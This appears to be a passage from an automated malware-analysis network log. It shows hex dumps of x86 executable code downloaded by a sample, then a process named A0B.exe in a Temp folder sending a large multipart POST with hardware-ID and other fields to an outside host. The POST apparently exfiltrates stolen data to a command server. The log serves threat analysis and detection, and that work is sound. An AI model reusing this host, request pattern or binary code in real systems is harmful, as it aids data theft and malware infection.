                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 56 56 ff 15 00 00 41 00 56 8d 85 80 fa ff ff 50 ff 15 18 00 41 00 56 e8 4b 11 00 00 56 56 e8 51 1b 00 00 56 56 e8 c8 1f 00 00 56 e8 86 1f 00 00 f3 0f 10 05 08 56 41 00 83 c4 18 0f 5a c0 56 51 51 f2 0f 11 04 24 e8 8c 17 00 00 83 c4 0c dd d8 56 e8 5f 2a 00 00 a1 88 bf 41 00 81 c1 4b 13 01 00 51 56 a3 28 35 ec 00 89 0d 24 34 ec 00 ff 15 1c 00 41 00 8d 4d dc a3 7c 33 ec 00 51 6a 40 ff 35 24 34 ec 00 50 ff 15 84 00 41 00 8b 1d 88 01 41 00 bf 6e 15 29 00 56 8d 85 80 ee ff ff 50 ff d3 4f 75 f3 8b 0d 24 34 ec 00 8b fe 85 c9 74 78 a1 28 35 ec 00 8a 8c 38 4b 13 01 00 a1 7c 33 ec 00 88 0c 38 8b 0d 24 34 ec 00 81 f9 90 04 00 00 75 51 8d 85 80 fe ff ff 50 ff 15 30 00 41 00 8d 45 f0 50 56 8d 45 94 50 56 ff 15 5c 00 41 00 56 ff 15 64 00 41 00 56 8d 85 80 e6 ff ff 50 8d
                                                                                                                                                                                                                                      Data Ascii: VVAVPAVKVVQVVVVAZVQQ$V_*AKQV(5$4AM|3Qj@5$4PAAn)VPOu$4tx(58K|38$4uQP0AEPVEPV\AVdAVP
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 8b ce e8 df 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 0c 53 8b 5d 08 56 57 8b f1 8b 7b 10 3b f8 72 74 2b f8 39 7d 10 0f 42 7d 10 3b f3 75 17 03 c7 50 e8 27 01 00 00 8b 45 0c 8b ce 50 6a 00 e8 49 01 00 00 eb 47 6a 00 57 e8 c1 01 00 00 84 c0 74 3b 83 7b 14 10 72 02 8b 1b 83 7e 14 10 72 04 8b 0e eb 02 8b ce 85 ff 74 10 8b 45 0c 57 03 c3 50 51 e8 52 05 00 00 83 c4 0c 83 7e 14 10 89 7e 10 72 04 8b 06 eb 02 8b c6 c6 04 38 00 5f 8b c6 5e 5b 5d c2 0c 00 68 f0 55 41 00 e8 f5 04 00 00 cc 55 8b ec 80 7d 08 00 56 57 8b 7d 0c 8b f1 74 20 83 7e 14 10 72 1a 53 8b 1e 85 ff 74 0b 57 53 56 e8 03 05 00 00 83 c4 0c 53 e8 c4 19 00 00 59 5b 89 7e 10 c7 46 14 0f 00 00 00 c6 04 37 00 5f 5e 5d c2 08 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7d 01 00 00 84 c0 74 1c 83 7e 14 10 72
                                                                                                                                                                                                                                      Data Ascii: ^]UES]VW{;rt+9}B};uP'EPjIGjWt;{r~rtEWPQR~~r8_^[]hUAU}VW}t ~rStWSVSY[~F7_^]US]VS}t~r
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: f0 c7 45 f0 f4 0f 41 00 50 e8 ea 21 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 db 26 00 00 68 88 5b 41 00 8d 45 f4 c7 45 f4 1c 10 41 00 50 e8 bc 21 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 ad 26 00 00 68 c4 5b 41 00 8d 45 f4 c7 45 f4 28 10 41 00 50 e8 8e 21 00 00 cc cc cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 68 03 00 00 0f ba 25 b0 de 81 00 01 73 07 f3 a4 e9 17 03 00 00 81 f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 08 70 41 00 01 0f 82 da 04 00 00 0f ba 25 b0 de 81 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f
                                                                                                                                                                                                                                      Data Ascii: EAP!UEMEEP&h[AEEAP!UEMEEP&h[AEE(AP!WVt$L$|$;v;h%s3u%pA%sv
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 5e 5f c3 90 8a 46 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04
                                                                                                                                                                                                                                      Data Ascii: ^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tv
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 29 40 00 ff 24 8d 74 2a 40 00 90 88 29 40 00 ac 29 40 00 d4 29 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 74 2a 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 74 2a 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 74 2a 40 00 8d 49 00 28 2a 40 00 30 2a 40 00 38 2a 40 00 40 2a 40 00 48 2a 40 00 50 2a 40 00 58 2a 40 00 6b 2a 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 74 2a
                                                                                                                                                                                                                                      Data Ascii: )@$t*@)@)@)@F#Gr$t*@IF#GFGr$t*@F#GFGFGV$t*@I(*@0*@8*@@*@H*@P*@X*@k*@DDDDDDDDDDDDDD$t*
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 41 70 c6 46 0c 01 eb 0a 8b 01 89 06 8b 41 04 89 46 04 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 10 56 57 8b 7d 08 85 ff 0f 84 83 00 00 00 80 3f 00 74 7e 8b 75 0c 85 f6 74 77 ff 75 10 8d 4d f0 e8 4e ff ff ff 8d 45 f0 50 0f b6 07 50 e8 74 2f 00 00 59 85 c0 8b 45 f0 59 74 2a 83 78 74 01 7e 3c 3b 70 74 7c 37 6a 00 6a 00 ff 70 74 57 6a 09 ff 70 04 ff 15 b0 00 41 00 85 c0 74 20 8b 45 f0 8b 70 74 eb 1b 6a 00 6a 00 33 f6 46 56 57 6a 09 ff 70 04 ff 15 b0 00 41 00 85 c0 75 03 83 ce ff 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c6 eb 02 33 c0 5f 5e 8b e5 5d c3 55 8b ec 83 3d d4 de 81 00 00 75 07 68 00 7a 41 00 eb 02 6a 00 ff 75 0c ff 75 08 e8 42 ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00
                                                                                                                                                                                                                                      Data Ascii: ApFAF^]UVW}?t~utwuMNEPPt/YEYt*xt~<;pt|7jjptWjpAt Eptjj3FVWjpAu}tMap3_^]U=uhzAjuuB]W|$n$L$W
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 59 8b f8 eb 4d 8b 75 08 83 cf ff 6a 00 6a 00 57 56 6a 09 ff 70 04 ff 15 b0 00 41 00 85 c0 75 0d e8 eb 15 00 00 c7 00 2a 00 00 00 eb 25 33 ff eb 1b 8d 4d f0 0f b6 c0 51 50 e8 2d 2a 00 00 59 59 85 c0 74 06 46 80 3e 00 74 08 47 46 8a 06 84 c0 75 df 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd 8b c7 5f 5e 8b e5 5d c3 55 8b ec b8 28 10 00 00 e8 69 42 00 00 a1 10 7f 41 00 33 c5 89 45 fc 57 8b 7d 08 89 bd ec ef ff ff 85 ff 75 18 e8 7f 15 00 00 c7 00 16 00 00 00 e8 05 15 00 00 83 c8 ff e9 44 03 00 00 53 56 57 e8 5e 2d 00 00 33 db 8b f0 59 89 b5 e8 ef ff ff 39 5f 04 7d 03 89 5f 04 6a 01 53 56 e8 0f 3f 00 00 83 c4 0c 89 85 f4 ef ff ff 85 c0 0f 88 ac 02 00 00 8b c6 8b ce c1 f8 05 83 e1 1f c1 e1 06 89 85 f0 ef ff ff 89 8d e0 ef ff ff 8b 14 85 38 e0 81 00 8b 47 0c 89 85 dc
                                                                                                                                                                                                                                      Data Ascii: YMujjWVjpAu*%3MQP-*YYtF>tGFu}tMap_^]U(iBA3EW}uDSVW^-3Y9_}_jSV?8G
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 81 00 eb 05 b8 d0 7e 41 00 f6 40 24 7f 75 a9 3b d7 74 19 83 fa fe 74 14 8b c2 c1 f8 05 83 e2 1f c1 e2 06 03 14 85 38 e0 81 00 eb 05 ba d0 7e 41 00 f6 42 24 80 75 81 e8 33 29 00 00 83 c0 20 50 6a 01 e8 6d 29 00 00 59 59 83 65 fc 00 e8 1d 29 00 00 83 c0 20 50 e8 e1 42 00 00 89 45 e0 ff 75 08 e8 ee f3 ff ff 8b f0 e8 02 29 00 00 83 c0 20 50 56 6a 01 ff 75 08 e8 36 41 00 00 83 c4 18 3b c6 75 32 e8 e7 28 00 00 ff 48 24 78 11 e8 dd 28 00 00 8d 48 20 8b 01 c6 00 0a ff 01 eb 12 e8 cc 28 00 00 83 c0 20 50 6a 0a e8 b5 3f 00 00 59 59 33 ff 89 7d e4 e8 b5 28 00 00 83 c0 20 50 ff 75 e0 e8 45 42 00 00 59 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e9 ef fe ff ff 8b 7d e4 e8 8e 28 00 00 83 c0 20 50 6a 01 e8 32 29 00 00 59 59 c3 55 8b ec 56 8b 75 08 8b 46 0c a8 83 75 10 e8 b5
                                                                                                                                                                                                                                      Data Ascii: ~A@$u;tt8~AB$u3) Pjm)YYe) PBEu) PVju6A;u2(H$x(H ( Pj?YY3}( PuEBYYE}( Pj2)YYUVuFu


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      15192.168.2.649734104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC291OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 580592
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 31 31 34 44 42 45 36 31 38 44 43 45 34 39 45 39 36 41 33 42 43 30 36 42 38 41 41 34 44 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                                                                                                                                                                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"45114DBE618DCE49E96A3BC06B8AA4D3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: c6 81 2c 35 78 2f f5 b1 3e 79 51 2e 3d c6 f0 b1 98 c1 97 3d 89 71 ca 40 bb 63 b0 d3 14 19 95 5c db ff 4e 21 84 50 21 36 3d 15 ea e6 05 12 e1 b0 0d 52 57 29 d2 60 2f ec 1f 11 cc 43 18 96 aa b6 f7 18 dd 8b 59 3d 59 b9 e2 2a 08 05 56 71 83 0c 7e 27 53 34 9a 22 f2 9f 86 dc 7a 23 0c 64 82 3f 17 62 63 0d 93 25 7e d5 f8 b0 69 10 e6 f1 6a 5e 2c 94 dd a7 3a ca 9f 63 b1 02 f9 a6 d5 c3 8b c3 42 da 9b 67 82 0e 3e a0 5c 9b 37 89 f7 c4 4c ea f4 c2 13 3c 1d c5 b9 58 58 77 d1 ac f5 fd 9e a4 17 bb e8 db 13 d3 14 7d e9 a9 62 b9 95 00 76 54 d6 6c d2 48 22 36 56 df fd 3a 08 05 e1 88 f2 68 6b c8 ca 6b 41 77 3c 82 3b f9 7f 1c 00 cf 5d 84 98 b3 8c 8d 6f ea fe 75 16 7d a1 3b c1 61 7d 99 fe a0 9e 69 ca 4c f8 2d 1d ee 9d 39 65 3e 49 24 de 69 33 eb 83 27 30 a7 c0 5b c1 29 af c5 eb
                                                                                                                                                                                                                                      Data Ascii: ,5x/>yQ.==q@c\N!P!6=RW)`/CY=Y*Vq~'S4"z#d?bc%~ij^,:cBg>\7L<XXw}bvTlH"6V:hkkAw<;]ou};a}iL-9e>I$i3'0[)
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 59 5d a8 e4 73 e6 96 d7 c1 0f 15 bf 7a 85 49 0e 8f 44 fc b7 28 b3 dd 3f e2 b8 13 97 7d 7f da 56 dd fc bd f0 7d 20 c5 f7 fb 44 c8 5a b6 7d 99 89 5c 70 b3 8a e5 bb e7 d7 81 5f 83 5e 15 5d eb 54 45 8f ad ee 1a c1 77 a5 c7 09 37 c7 89 4d b5 99 d1 0f 8e dc 57 a3 15 b8 df 67 ea e8 89 81 85 5b 36 e5 76 42 d3 a7 07 be 12 7f ec 71 bb db ba d6 f8 2b af f8 63 93 fb b4 d7 f6 9b 8a c6 29 14 27 33 31 ef 4b fa 80 b4 47 e5 4f 39 fb b2 9e 2f 97 4a 3e a9 d8 be cf 3d 04 82 90 1f 38 50 ea 33 d5 ff 52 c5 7a 80 ef c9 77 7a bc c7 7e 14 d3 c4 6e 29 6d 89 47 48 c4 7d 81 76 65 72 ca 4e 4e e6 74 9f be 5f cd c6 69 37 01 70 a6 72 f8 2e 38 fd 5d 0a a3 ed 68 f0 45 28 64 69 64 d3 6b 3f fb 94 fb 5d 17 32 9b a6 27 b0 e6 db 89 02 e7 4d b5 24 c8 6d 86 bf 53 b6 bf b3 8b 96 ac c3 75 54 e9 54
                                                                                                                                                                                                                                      Data Ascii: Y]szID(?}V} DZ}\p_^]TEw7MWg[6vBq+c)'31KGO9/J>=8P3Rzwz~n)mGH}verNNt_i7pr.8]hE(didk?]2'M$mSuTT
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 56 08 b9 f0 2b 75 c0 4e e1 e3 db 60 6e ad d7 e9 f4 4e da ee 12 a3 f6 09 6b 1e 9d 85 35 25 70 4c b0 10 df 50 b0 4a 25 f6 cc 1b 7f 17 3a 89 eb fd ea fd 75 53 27 fe db 1c 8e 36 3b d7 72 42 65 1b 9e 8a d6 76 d3 63 0d bc 75 d7 4e 8c 68 12 61 24 bf 49 6a e2 9c d8 f4 fc 3b 27 e8 77 e1 51 78 6e e9 ae c0 b7 53 5c 62 a5 c0 17 27 35 f9 85 c1 06 7b 66 e3 11 e3 e6 05 6c 9e 28 be e0 e6 90 8e 21 38 83 e9 3a 00 0e 3e f8 46 50 7e 20 e5 1f f6 a7 e5 d3 3a 9b 4a 97 bf 22 53 06 0f 30 32 8c 0e dc bf 84 bd ac 90 cd 3c 62 6f 9b 26 4b f6 5c af 5c 4e 90 d8 c8 dc f0 fd b6 f2 fb 77 e8 d0 a5 da a5 79 43 96 45 9d f7 b7 b0 88 8b 42 df a7 c2 93 84 06 54 c3 76 5d b0 8c f6 fd 68 bf ba c9 0a 66 ce ac 85 76 be c2 e3 70 05 92 ec c1 9f d8 37 a2 4c 6e 25 df 59 80 73 a9 c3 15 dc 06 d1 a1 59 a9
                                                                                                                                                                                                                                      Data Ascii: V+uN`nNk5%pLPJ%:uS'6;rBevcuNha$Ij;'wQxnS\b'5{fl(!8:>FP~ :J"S02<bo&K\\NwyCEBTv]hfvp7Ln%YsY
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: ea 42 96 c6 60 62 08 d0 b2 0a 49 1f a0 0b 57 80 53 fa d5 6e 9c f8 77 6e 1e 21 11 81 e0 1d 77 5e 39 68 0d ec 22 dd 30 00 be 2c be 1a db 81 01 9f 51 25 39 c4 18 ed 94 9f ae 03 23 cd 6d 8f 93 77 ea 08 68 31 8f 0c 65 5a 85 59 42 76 bb 8b 2c 10 f9 81 6d 0b 2e f4 01 79 ce 05 df 1e 53 5a 45 6d 68 50 24 83 00 95 46 c8 a4 9c de 32 1a e4 2b 05 ec c6 91 8b 09 5e fc cd d6 fa ed 62 09 98 1b 7b 7a 91 cd c1 be e2 60 fb fc ef 52 b2 3a 87 c2 49 f6 a9 92 82 9e f0 47 39 e9 3e 64 82 15 23 4f 4f cd aa 4e bc 04 eb d7 c6 73 03 7f a5 92 62 29 3d 63 5e 6e 78 62 16 2a 6c 6a 4b 5b 37 b9 2c f5 c9 ee 74 a3 d5 4f 3f d3 88 58 71 d7 cc bf d9 a4 64 af db 2e 30 fc d1 83 0e 1b cf 89 d8 13 8c 90 b5 5b 46 cc 64 92 ad 0a f5 d9 7a 9a 85 99 54 64 eb fa f8 8b 6f e9 bd 71 e3 bf 6b 0f e1 03 04 ae
                                                                                                                                                                                                                                      Data Ascii: B`bIWSnwn!w^9h"0,Q%9#mwh1eZYBv,m.ySZEmhP$F2+^b{z`R:IG9>d#OONsb)=c^nxb*ljK[7,tO?Xqd.0[FdzTdoqk
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: bf 05 f2 7d 3b 9d 9f 2e 25 c1 67 19 e9 d8 30 10 8a f0 b3 84 e5 de 9d e9 f6 e3 22 11 e5 81 f1 51 e6 72 a4 89 85 98 93 64 c3 44 03 1e 6e ee 35 43 5f 36 7e 5a 53 9e f8 ee ad b3 fd 1f 17 b9 cc 8c 2d 5a 6a 04 3f ef d7 26 f2 60 31 d4 fd 1d 7f fa b8 10 20 aa 71 16 64 cb 39 00 b2 38 02 82 68 e2 60 ce 41 c4 99 2e 79 c2 6b 50 64 76 e0 d6 05 02 10 44 9b 5f 85 64 6e cd 68 e3 20 47 5e f1 2b 24 7e 10 ae cf 05 3b 2f 83 64 55 66 0f 0a 3c 52 b2 17 45 b4 19 5f eb eb 71 b7 62 cb 69 cb a7 fc a6 b1 fc d2 89 fc 5f 10 3c 1a b4 cc 7a ea f5 0a 33 b5 09 cd 6f 66 b9 70 de 1c 05 96 31 86 c9 22 b1 a1 7f 35 8e 3d 79 5f 67 17 b6 e7 49 5c 87 8d cf b1 f0 09 b3 ed 35 5d 21 8e ef 67 ce 7c f6 8b 45 8e ef fb 31 ea b3 cf 5b 87 35 31 6b a2 af 73 af 69 62 96 ed 4e c8 7f 48 fd 02 bc bb 81 b7 b5
                                                                                                                                                                                                                                      Data Ascii: };.%g0"QrdDn5C_6~ZS-Zj?&`1 qd98h`A.ykPdvD_dnh G^+$~;/dUf<RE_qbi_<z3ofp1"5=y_gI\5]!g|E1[51ksibNH
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 3c ed c6 5b e0 98 9a 1b fe 9f ba 00 f8 3d 23 bf 10 85 00 af d6 e6 ed b6 ba a4 d6 54 0a 0f af 3f 17 69 be 07 95 9a 4f 93 86 31 61 ea 92 f9 97 b6 bb 3e d2 24 c3 2f 88 ae 5f 93 4a b9 f4 49 99 21 d5 0f 97 89 a4 10 95 31 a0 62 7e 77 d8 8b 7d 29 21 53 5c bc df b9 31 3b 59 95 be 2b 57 66 25 d4 01 35 86 f4 b1 bf 71 31 5b 43 6b 88 93 6d 8f e9 f1 3c ee 52 29 4c 65 fc 92 df 45 6a fe ad 5e f6 a9 2e 59 b9 4c 93 08 88 dd ca e6 c1 a7 08 87 96 48 d1 fd 56 5e f5 59 4c b0 63 1c e0 ef 6d cc 6e fb e9 fa 2d 2d da 97 cc 85 fc 04 73 9b a7 da ae 1f 77 cd 6d c4 ab 69 7e 43 11 3d 79 ae 56 59 8f d6 4f 09 b5 e3 55 48 32 52 30 ec 55 f5 4e 30 c5 9c a2 34 4a 12 f6 80 6a 3d a6 0b d3 58 39 2d 7e 5c d7 79 54 c2 b9 18 f2 34 e8 10 b5 1d 45 9c 2b 7d d6 c0 0d f6 56 c9 8f 59 75 c9 16 c4 2d 1a
                                                                                                                                                                                                                                      Data Ascii: <[=#T?iO1a>$/_JI!1b~w})!S\1;Y+Wf%5q1[Ckm<R)LeEj^.YLHV^YLcmn--swmi~C=yVYOUH2R0UN04Jj=X9-~\yT4E+}VYu-
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: a1 fc ec 9b 63 7a ea a8 b6 cd 54 ed 2b 4d e6 ea db 4f 37 a4 a1 6f c7 cd ed 5d 89 54 23 58 e6 d7 88 5d 81 88 74 95 8c ef 41 57 e3 3a 0d b0 ab a9 f5 89 5e 88 19 75 70 fa 43 3a 3a 48 0e 6a 3f 95 74 da d7 6a 1f 81 8f b2 8b d0 6f fc 18 07 0b e6 06 7e de 58 f4 9b 6d ff 36 f0 c9 5c 33 a2 70 6a f4 a7 5f 4a 91 3b 55 a1 a6 6f 84 ec 88 5b 8e f3 10 e4 80 f9 d4 cb 7d a3 cc 9a 3d ca 7b 22 44 99 48 f2 fb 81 d2 90 1c de 55 ea be c7 d5 ec b2 f3 e2 50 26 37 c0 9a bb 60 c9 e8 00 30 77 1d ea 16 7b 0d b9 39 61 88 ac 7e 4f db 65 1c f3 b1 83 c9 b6 5e b7 51 4e ec 4c f5 7a ef 46 50 b4 5f 29 af 57 fb d6 9f 58 64 56 86 56 b5 e6 86 91 c9 d0 ba b0 f2 af a5 cc bd 4b 1c 0c b1 c5 b4 70 64 f3 e9 65 9d aa 48 4c e0 bc e2 b8 92 cb da 85 18 d0 ba 51 45 c0 fc 1a 88 0c ba 25 50 7a b1 7a 9f c9
                                                                                                                                                                                                                                      Data Ascii: czT+MO7o]T#X]tAW:^upC::Hj?tjo~Xm6\3pj_J;Uo[}={"DHUP&7`0w{9a~Oe^QNLzFP_)WXdVVKpdeHLQE%Pzz
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 5b dd 27 ef 05 3e 82 fc 71 18 3e 21 e2 8d 88 12 58 f1 e5 ba a3 22 ee 0a 50 be 44 32 9d f0 db 3d aa e3 5f 0e c4 54 4c 50 a5 77 9e 36 be fc 86 84 53 1a 63 0e e6 c7 54 de a9 5e 8c 25 5d 10 9d 4d 64 9b 94 a2 a0 95 bd 31 03 93 7d 34 7f 81 ee 15 86 59 2d 44 3e 12 74 03 cb 01 62 90 b0 98 9a 45 85 0c 83 90 a9 75 85 78 08 e3 70 f2 e0 cd 23 6c 44 db 15 4d b5 6a 21 94 2c e7 cc ca 23 04 7c 6e 39 8b 8f 15 6c 15 69 7b f5 10 d0 c6 29 3f c0 4f 21 4a dc cb 10 1a bb df 73 36 e5 84 74 15 e0 4f 5f 49 8d 87 79 77 f4 e1 70 29 0a 75 e3 7c 95 32 4b 99 92 91 1c ca c2 1e ce 8c 17 d0 36 98 52 8c 58 ef 95 a5 67 98 91 d1 f4 87 61 d7 39 0f dc 2d 68 b7 d8 85 9c 4a b5 e6 15 35 ec fb 22 d0 b5 ec 95 46 77 44 82 e7 7e 49 6f cf 57 d9 76 f8 2a 79 0a 7c 51 37 75 df 2e 4e ce a8 35 41 47 b6 2f
                                                                                                                                                                                                                                      Data Ascii: ['>q>!X"PD2=_TLPw6ScT^%]Md1}4Y-D>tbEuxp#lDMj!,#|n9li{)?O!Js6tO_Iywp)u|2K6RXga9-hJ5"FwD~IoWv*y|Q7u.N5AG/
                                                                                                                                                                                                                                      2024-03-28 16:51:30 UTC15331OUTData Raw: 9c cc 22 fc 3e c3 51 6e 32 12 78 31 e7 70 df e4 3d 38 32 e8 fe 56 7d 3b 06 86 c3 61 1a a0 97 ee 04 6d 9d 9a 05 7b 2c c2 65 a1 b3 d2 c4 ba a5 bd 5f 0c 10 a0 4e ff f9 75 b2 45 d8 1e 04 d9 00 21 89 1b 7d 3b 80 39 82 5b a9 d9 21 c3 54 92 87 05 57 3b b9 5e 83 ca 83 99 0e b1 3c 71 f0 63 09 d3 99 b3 55 4f 9c 63 d5 58 69 46 eb 90 8d 63 39 87 54 bf 7a 0a 1d 25 62 7e ef 67 6e 1d 99 89 57 aa d2 d5 5d 1f c2 ca 5c 81 32 35 44 a0 d9 a2 79 b2 56 6d b9 02 17 da 98 1b ff cd 3c 1b 36 a0 da 59 04 ec 0a 75 a4 e2 74 98 a4 6a 3c 07 39 65 3e f2 88 0f 0c 4d ea 68 b2 62 f5 06 47 40 ec 7a ca 5c c3 c7 30 f5 19 ca f7 98 e6 f9 22 36 d9 02 1e 9c b7 97 ce 4c fc 2d d0 a0 b4 65 52 2b 12 3d 83 13 72 35 b3 d2 ab 22 5b 5b ca 90 01 85 34 1a 75 7d cf 48 24 00 96 cb e5 85 2c 42 5b 98 a8 64 5f
                                                                                                                                                                                                                                      Data Ascii: ">Qn2x1p=82V};am{,e_NuE!};9[!TW;^<qcUOcXiFc9Tz%b~gnW]\25DyVm<6Yutj<9e>MhbG@z\0"6L-eR+=r5"[[4u}H$,B[d_
                                                                                                                                                                                                                                      2024-03-28 16:51:33 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=26k7nrbul4bbg3f65vtle2btr7; expires=Mon, 22-Jul-2024 10:38:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKDTr3yK5AzRfyWclcAKg2Zt%2Fdxm7OBXkfoMm0dMbU%2BI3BFf650LDIbl0KVzQePhaaayfVZll%2Bi0b7oqs6Bk%2F417ysLD9gggms%2FbjtpZshGATwbsc%2F82pF0NMEz3lkl0W4z62tErvM5stLw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b920126e1239af-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
